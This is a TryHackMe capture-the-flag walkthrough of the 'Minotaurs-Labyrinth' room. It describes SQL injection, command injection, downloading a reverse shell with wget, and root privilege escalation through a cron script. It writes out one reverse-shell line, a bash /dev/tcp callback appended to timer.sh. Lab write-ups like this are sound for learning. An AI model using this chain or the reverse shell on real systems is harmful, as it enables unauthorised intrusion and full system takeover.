Minotaurs-Labyrinth TryHackMe Writeup


We run nmap on all ports with scripts and software versions.


In the nmap, we see that there is an FTP that can be accessed anonymously, we mount the ftp in our kali and list the first flag.

We found the website, tried default credentials, but nothing.

We reviewed the source code, found a few comments that might be useful (or fake). We are interested in the “login.js” file.

Content of login.js file


We have a comment where comes the password of the user “Daedalus”, we make the substitution of the arrays and we obtain the credentials.

We check that the site is vulnerable to SQL Injection (Time-based).

We obtain databases

We obtain tables

We obtain People columns

We obtain the flat password using the hash.

We access with the administrator credentials and find a flag.

We find the secret section, we see that we can execute the ECHO command from this PHP application.


We tried to bypass it with command.


Read /etc/passwd

Reverse shell

We create a file with our reverse shell “m3.sh”, download it with “wget” on the victim machine, give it execution permissions and execute it.

Executing file m3.sh

We check the version of python installed and configure the terminal to have a more interactive session.

We are looking for the location of the remaining flags.

Read user.txt file

Privilege Escalation

We see the following folder which is not common on a Linux system. Inside, there is a file with a script, it may be running from time to time.

We download pspy64, run it and see how the user “root (UID=0)” is running the script every so often.

We add the following line to the file “timer.sh” to get a shell with the user that executes the file.

echo "bash -i >& /dev/tcp/XX.XX.XX.XX/555 0>&1" >> timer.sh

We wait a few minutes and we will get a shell as root and read the flag.